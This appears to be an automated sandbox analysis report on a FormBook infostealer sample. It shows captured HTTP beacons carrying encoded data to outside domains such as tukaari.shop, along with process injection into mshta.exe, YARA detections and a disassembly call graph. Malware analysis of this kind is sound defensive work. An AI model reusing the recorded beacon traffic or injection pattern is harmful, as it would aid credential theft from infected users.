                                                                                                                                                            Content-Length: 1243
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 4f 54 6b 2b 7a 6d 4c 30 32 46 68 42 4b 37 4d 4b 38 4d 6e 6b 6a 64 31 59 63 4a 75 34 54 4c 58 52 30 45 63 34 4c 74 66 36 56 38 45 64 73 67 67 48 65 42 47 69 64 72 50 4f 77 6b 66 6d 62 74 37 44 4e 44 77 4c 72 37 74 6f 63 65 42 63 71 33 61 31 6c 4d 7a 68 35 44 68 56 7a 66 4f 4f 4c 68 51 79 78 68 77 31 36 46 49 78 4b 79 6e 62 6f 70 58 61 49 66 50 47 55 57 45 53 39 56 4b 52 6d 69 7a 4d 63 6f 41 4b 47 56 41 74 30 73 6e 66 79 4b 77 36 50 57 55 38 73 4d 6d 31 4b 62 6e 72 46 62 57 4f 72 54 52 6a 69 38 59 62 45 34 6a 4d 6a 51 70 34 41 32 4f 72 2f 69 6a 30 2f 4f 43 66 2f 77 50 54 59 63 53 69 79 62 4f 49 4b 6a 4d 75 47 42 6d 65 76 69 44 39 44 52 6b 70 53 67 37 37 49 41 4d 33 73 6e 74 39 4c 41 38 35 6d 48 59 69 37 54 78 4c 36 4f 35 76 4d 57 69 4b 75 4e 51 77 57 71 61 4e 42 36 53 4d 35 76 79 74 6f 4f 5a 71 50 4d 41 45 78 70 68 6f 56 49 43 77 75 43 64 42 79 44 59 4a 66 58 78 4c 4c 48 50 43 53 55 64 75 57 4a 79 69 7a 51 47 64 53 5a 7a 4c 41 35 77 47 69 58 6a 6c 64 71 37 69 38 36 4a 4c 42 38 42 [TRUNCATED]
                                                                                                                                                            Data Ascii: mnYxMt=OTk+zmL02FhBK7MK8Mnkjd1YcJu4TLXR0Ec4Ltf6V8EdsggHeBGidrPOwkfmbt7DNDwLr7toceBcq3a1lMzh5DhVzfOOLhQyxhw16FIxKynbopXaIfPGUWES9VKRmizMcoAKGVAt0snfyKw6PWU8sMm1KbnrFbWOrTRji8YbE4jMjQp4A2Or/ij0/OCf/wPTYcSiybOIKjMuGBmeviD9DRkpSg77IAM3snt9LA85mHYi7TxL6O5vMWiKuNQwWqaNB6SM5vytoOZqPMAExphoVICwuCdByDYJfXxLLHPCSUduWJyizQGdSZzLA5wGiXjldq7i86JLB8BdzexsFSinKhED3gFmuGyrzO2kZ4sUj+tWAn0DlmRokhwQa/Li5cotPna75RSSv6c9tjAtZ96GVmSex4WsWLG8mrboE8e6BaKrFVl8lSqErcIH2+SD8s9Y2A2UAsIt+Yq2bh24sg73lzg8iJNDIAyPOFxEJu4cnbl7BPhbcTC/JURIjsxG3MyWYTNZmj83dC9WhBaht7Cttz+kot3N4zxbYvICa4CDTpaaP0dMtLu5SqlSBYjasxF0etaVPFaAXXutm+kzCjT5X647rUB4UPRVUGIiYEhN5bsSqAc8785ioLsnkPGiotfsX2xzXNkn5AtdGpUc2oDK7NdH7W+RLR5VSD4VappNfNwII/X9X7aueX3x3qq41zl4BT6KVqXJuNJIbk+Wecd+WMoGr38F9SXHVSYXfWM+mnB7EGH/lmHA93S4aOHFDM3iRVb6olzU2bFm9iSJwzrxHrrjKJrSBEO2DsigOT/omFn7S0NRDwy0M7+qvbBfa8+y2kWsRDsOvAYRoJVMwtGV9PmqAu0QvmeZHJ/EiXkqToJR9mSgSnwEhQ92h3qxxWh9gn949hwGPpvicNagrSs9/aetWfXdEuwpGUPBY8kSQD++NGONnk9tHCTv6qxxgmhRjQ8RttQ+7jAZs7/sAKGriT6cn4/VbigeS52eSXg6/u03E [TRUNCATED]


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            52192.168.2.8537663.33.130.19080
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:37:21.937359095 CET537OUTGET /h8b0/?mnYxMt=DRMewQ2K/nAxApdBv9ra6bsCdKq6L6XhjAtlDuz9ScYe9TdKczyHToKl/nXwUp75CTxdtMRmJbFDzl6M6vndpgUg2JSERF0UkR4bqmVQDFHy6vjAN9/CTn0QkHjb1AS2LQ==&TTd=yRNPZBU8fZA HTTP/1.1
                                                                                                                                                            Host: www.tukaari.shop
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Nov 12, 2024 18:37:22.562114954 CET410INHTTP/1.1 200 OK
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:37:22 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 270
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 6e 59 78 4d 74 3d 44 52 4d 65 77 51 32 4b 2f 6e 41 78 41 70 64 42 76 39 72 61 36 62 73 43 64 4b 71 36 4c 36 58 68 6a 41 74 6c 44 75 7a 39 53 63 59 65 39 54 64 4b 63 7a 79 48 54 6f 4b 6c 2f 6e 58 77 55 70 37 35 43 54 78 64 74 4d 52 6d 4a 62 46 44 7a 6c 36 4d 36 76 6e 64 70 67 55 67 32 4a 53 45 52 46 30 55 6b 52 34 62 71 6d 56 51 44 46 48 79 36 76 6a 41 4e 39 2f 43 54 6e 30 51 6b 48 6a 62 31 41 53 32 4c 51 3d 3d 26 54 54 64 3d 79 52 4e 50 5a 42 55 38 66 5a 41 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mnYxMt=DRMewQ2K/nAxApdBv9ra6bsCdKq6L6XhjAtlDuz9ScYe9TdKczyHToKl/nXwUp75CTxdtMRmJbFDzl6M6vndpgUg2JSERF0UkR4bqmVQDFHy6vjAN9/CTn0QkHjb1AS2LQ==&TTd=yRNPZBU8fZA"}</script></head></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            53192.168.2.85376735.156.117.13180
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:37:30.681700945 CET541OUTGET /s7e8/?TTd=yRNPZBU8fZA&mnYxMt=Qf5nKOHOS6pOo2hrLtSm+ampCv+PHNIpbdUHnCIedAl2mvk/ZCfVPn7bYBvLSFyKndMpVE3F/mLSkI4cHOWneDowc/gh6rYJzY7Er9+/8bJZT8eqOHKV6gTsddlCzKVbHQ== HTTP/1.1
                                                                                                                                                            Host: www.specialgift.asia
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Nov 12, 2024 18:37:32.004672050 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:37:31 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Content-Length: 2088
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Status: 404 Not Found
                                                                                                                                                            X-Request-Id: 2978624a8f32ae2f31fda779228655a8
                                                                                                                                                            X-Runtime: 0.027656
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 53 74 72 69 6b 69 6e 67 6c 79 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 7c 4f 70 65 6e 2b 53 61 6e 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 2f 61 73 73 65 74 73 2e 73 74 72 69 6b 69 6e 67 6c 79 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 34 30 34 2d 73 74 [TRUNCATED]
                                                                                                                                                            Data Ascii: <html> <head> <title>Page not found - Strikingly</title> <meta id="viewport" name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0" /> <link href='https://fonts.googleapis.com/css?family=Montserrat|Open+Sans' rel='stylesheet' type='text/css'> <link href='//assets.strikingly.com/assets/404-styles.css' rel='stylesheet' type='text/css'> ...[if lte IE 7]> <style> .wide { padding-top: 160px; } </style> <![endif]--> <script type="text/javascript"> // Google Analytics (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-25124444-6', 'auto'); ga('set', 'anonymizeIp
                                                                                                                                                            Nov 12, 2024 18:37:32.004693031 CET1130INData Raw: 27 2c 20 74 72 75 65 29 3b 0a 20 20 20 20 20 20 67 61 28 27 73 65 6e 64 27 2c 20 27 70 61 67 65 76 69 65 77 27 2c 20 7b 20 27 61 6e 6f 6e 79 6d 69 7a 65 49 70 27 3a 20 74 72 75 65 20 7d 29 3b 0a 20 20 20 20 2f 2f 20 45 6e 64 20 47 6f 6f 67 6c 65
                                                                                                                                                            Data Ascii: ', true); ga('send', 'pageview', { 'anonymizeIp': true }); // End Google Analytics </script> </head> <body> <div class='bg-logo'></div> <div class='wide light-text'> <div class='col2'> <h1> PAGE NOT FOUN


                                                                                                                                                            Statistics

                                                                                                                                                            CPU Usage

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Memory Usage

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Behavior

                                                                                                                                                            Click to jump to process

                                                                                                                                                            System Behavior

                                                                                                                                                            General

                                                                                                                                                            Target ID:0
                                                                                                                                                            Start time:12:33:11
                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                            Path:C:\Users\user\Desktop\wavjjT3sEq.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\Desktop\wavjjT3sEq.exe"
                                                                                                                                                            Imagebase:0x120000
                                                                                                                                                            File size:289'280 bytes
                                                                                                                                                            MD5 hash:EA8D328BA326E4F6C37F0D853F981122
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1605691248.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1605691248.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1606273875.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1606273875.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:2
                                                                                                                                                            Start time:12:33:19
                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                            Path:C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe"
                                                                                                                                                            Imagebase:0x1000000
                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3911848031.0000000002BD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.3911848031.0000000002BD0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:false

                                                                                                                                                            General

                                                                                                                                                            Target ID:3
                                                                                                                                                            Start time:12:33:21
                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Windows\SysWOW64\mshta.exe"
                                                                                                                                                            Imagebase:0x6c0000
                                                                                                                                                            File size:13'312 bytes
                                                                                                                                                            MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3899264398.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3899264398.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3911530315.0000000003600000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3911530315.0000000003600000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3908871484.0000000003560000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3908871484.0000000003560000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:false

                                                                                                                                                            General

                                                                                                                                                            Target ID:5
                                                                                                                                                            Start time:12:33:34
                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                            Path:C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe"
                                                                                                                                                            Imagebase:0x1000000
                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3917330030.0000000005290000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3917330030.0000000005290000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:false

                                                                                                                                                            General

                                                                                                                                                            Target ID:7
                                                                                                                                                            Start time:12:33:48
                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                            Imagebase:0x7ff6d20e0000
                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Disassembly

                                                                                                                                                            Reset < >

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:1.2%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:5.3%
                                                                                                                                                              Signature Coverage:13.6%
                                                                                                                                                              Total number of Nodes:132
                                                                                                                                                              Total number of Limit Nodes:11
                                                                                                                                                              execution_graph 92448 133c73 92451 14cb43 92448->92451 92452 14cb5d 92451->92452 92455 1962c70 LdrInitializeThunk 92452->92455 92453 133c95 92455->92453 92456 13b4f3 92457 13b537 92456->92457 92458 14c8b3 NtClose 92457->92458 92459 13b558 92457->92459 92458->92459 92471 1341e3 92472 1341fc 92471->92472 92477 137983 92472->92477 92474 13421a 92475 134266 92474->92475 92476 134253 PostThreadMessageW 92474->92476 92476->92475 92478 1379a7 92477->92478 92479 1379e3 LdrLoadDll 92478->92479 92480 1379ae 92478->92480 92479->92480 92480->92474 92481 121be3 92482 121be9 92481->92482 92483 121b78 92481->92483 92486 150033 92483->92486 92489 14e553 92486->92489 92490 14e579 92489->92490 92501 127523 92490->92501 92492 14e58f 92493 121bda 92492->92493 92504 13b303 92492->92504 92495 14e5ae 92496 14e5c3 92495->92496 92498 14cc83 ExitProcess 92495->92498 92515 148553 92496->92515 92498->92496 92499 14e5dd 92500 14cc83 ExitProcess 92499->92500 92500->92493 92519 136643 92501->92519 92503 127530 92503->92492 92505 13b32f 92504->92505 92537 13b1f3 92505->92537 92508 13b374 92511 13b390 92508->92511 92513 14c8b3 NtClose 92508->92513 92509 13b35c 92510 13b367 92509->92510 92512 14c8b3 NtClose 92509->92512 92510->92495 92511->92495 92512->92510 92514 13b386 92513->92514 92514->92495 92516 1485b5 92515->92516 92518 1485c2 92516->92518 92548 1387f3 92516->92548 92518->92499 92520 136660 92519->92520 92522 136679 92520->92522 92523 14d313 92520->92523 92522->92503 92525 14d32d 92523->92525 92524 14d35c 92524->92522 92525->92524 92530 14bed3 92525->92530 92528 14e9a3 RtlFreeHeap 92529 14d3d5 92528->92529 92529->92522 92531 14bef0 92530->92531 92534 1962c0a 92531->92534 92532 14bf1c 92532->92528 92535 1962c11 92534->92535 92536 1962c1f LdrInitializeThunk 92534->92536 92535->92532 92536->92532 92538 13b20d 92537->92538 92542 13b2e9 92537->92542 92543 14bf73 92538->92543 92541 14c8b3 NtClose 92541->92542 92542->92508 92542->92509 92544 14bf90 92543->92544 92547 19635c0 LdrInitializeThunk 92544->92547 92545 13b2dd 92545->92541 92547->92545 92550 13881d 92548->92550 92549 138d2b 92549->92518 92550->92549 92556 133e53 92550->92556 92552 13894a 92552->92549 92553 14e9a3 RtlFreeHeap 92552->92553 92554 138962 92553->92554 92554->92549 92555 14cc83 ExitProcess 92554->92555 92555->92549 92558 133e73 92556->92558 92559 133edc 92558->92559 92561 13b613 RtlFreeHeap LdrInitializeThunk 92558->92561 92559->92552 92560 133ed2 92560->92552 92561->92560 92562 1962b60 LdrInitializeThunk 92408 148c43 92409 148ca8 92408->92409 92410 148ce3 92409->92410 92413 138d43 92409->92413 92412 148cc5 92414 138cd5 92413->92414 92417 14cc83 92414->92417 92416 138d2b 92416->92412 92418 14cc9d 92417->92418 92419 14ccae ExitProcess 92418->92419 92419->92416 92420 14be83 92421 14be9d 92420->92421 92424 1962df0 LdrInitializeThunk 92421->92424 92422 14bec5 92424->92422 92425 14fbc3 92428 14e9a3 92425->92428 92431 14cc33 92428->92431 92430 14e9bc 92432 14cc50 92431->92432 92433 14cc61 RtlFreeHeap 92432->92433 92433->92430 92434 144fc3 92435 144fdc 92434->92435 92436 145068 92435->92436 92437 145027 92435->92437 92440 145063 92435->92440 92438 14e9a3 RtlFreeHeap 92437->92438 92439 145033 92438->92439 92441 14e9a3 RtlFreeHeap 92440->92441 92441->92436 92460 144c33 92461 144c4f 92460->92461 92462 144c77 92461->92462 92463 144c8b 92461->92463 92465 14c8b3 NtClose 92462->92465 92464 14c8b3 NtClose 92463->92464 92466 144c94 92464->92466 92467 144c80 92465->92467 92470 14eac3 RtlAllocateHeap 92466->92470 92469 144c9f 92470->92469 92563 14fb63 92564 14fb73 92563->92564 92565 14fb79 92563->92565 92568 14ea83 92565->92568 92567 14fb9f 92571 14cbe3 92568->92571 92570 14ea9e 92570->92567 92572 14cc00 92571->92572 92573 14cc11 RtlAllocateHeap 92572->92573 92573->92570 92442 138f48 92445 14c8b3 92442->92445 92444 138f52 92446 14c8cd 92445->92446 92447 14c8de NtClose 92446->92447 92447->92444

                                                                                                                                                              Executed Functions

                                                                                                                                                              Function 00137983 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 47 137983-13799f 48 1379a7-1379ac 47->48 49 1379a2 call 14f6a3 47->49 50 1379b2-1379c0 call 14fca3 48->50 51 1379ae-1379b1 48->51 49->48 54 1379c2-1379cd call 14ff43 50->54 55 1379d0-1379e1 call 14e023 50->55 54->55 60 1379e3-1379f7 LdrLoadDll 55->60 61 1379fa-1379fd 55->61 60->61
                                                                                                                                                              APIs
                                                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 001379F5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Load
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2234796835-0
                                                                                                                                                              • Opcode ID: 352a911c7d75b054859a4398694d1711e84ed81b6f2a009f0faaad9a1ff4d0c8
                                                                                                                                                              • Instruction ID: a115f9663307aee79ab401e78fdfb9c29f493363a1aa3599b5c9ba5979dc5a1a
                                                                                                                                                              • Opcode Fuzzy Hash: 352a911c7d75b054859a4398694d1711e84ed81b6f2a009f0faaad9a1ff4d0c8
                                                                                                                                                              • Instruction Fuzzy Hash: D30121B5E0020DBBDF10DBE4DC42F9DB3B8AB54318F0042A5E90897290F771EB598B91
                                                                                                                                                              Function 0014C8B3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 72 14c8b3-14c8ec call 124843 call 14db13 NtClose
                                                                                                                                                              APIs
                                                                                                                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0014C8E7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3535843008-0
                                                                                                                                                              • Opcode ID: 1f2e55867fb49e0edbdfca481a993cadd69b59c11f28a48fb14a12efc8519f18
                                                                                                                                                              • Instruction ID: a7e15e46162e6ea32cd5983bea1f69f96633e07062b455dff6db3d061c3b3165
                                                                                                                                                              • Opcode Fuzzy Hash: 1f2e55867fb49e0edbdfca481a993cadd69b59c11f28a48fb14a12efc8519f18
                                                                                                                                                              • Instruction Fuzzy Hash: CCE04F362102147BDA20AA59EC41FDB775CDBC5750F004019FA0DA7282D7B07A1086E1
                                                                                                                                                              Function 01962B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 86 1962b60-1962b6c LdrInitializeThunk
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 3c1bc8fccb3fb1d7272736cf0f9c9b03d16dd65b7695a18d89b3fec152b40d36
                                                                                                                                                              • Instruction ID: 88cdd937a8cd9545f647cf91fed95189d442a3eeaab275bb04f8af9c1128e21c
                                                                                                                                                              • Opcode Fuzzy Hash: 3c1bc8fccb3fb1d7272736cf0f9c9b03d16dd65b7695a18d89b3fec152b40d36
                                                                                                                                                              • Instruction Fuzzy Hash: BE9002612025000341097158441C616804E9BE0201B55C031E1054590DC52589916225
                                                                                                                                                              Function 01962DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 88 1962df0-1962dfc LdrInitializeThunk
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: b718d9d7ec66ca47dea8d14403af8c3bf72dd340a34540cb47ce01b1113aa437
                                                                                                                                                              • Instruction ID: 029e9dac7dce4cfb8fe1404899387a03c5af09e565dc05cf1cd320d702fa6585
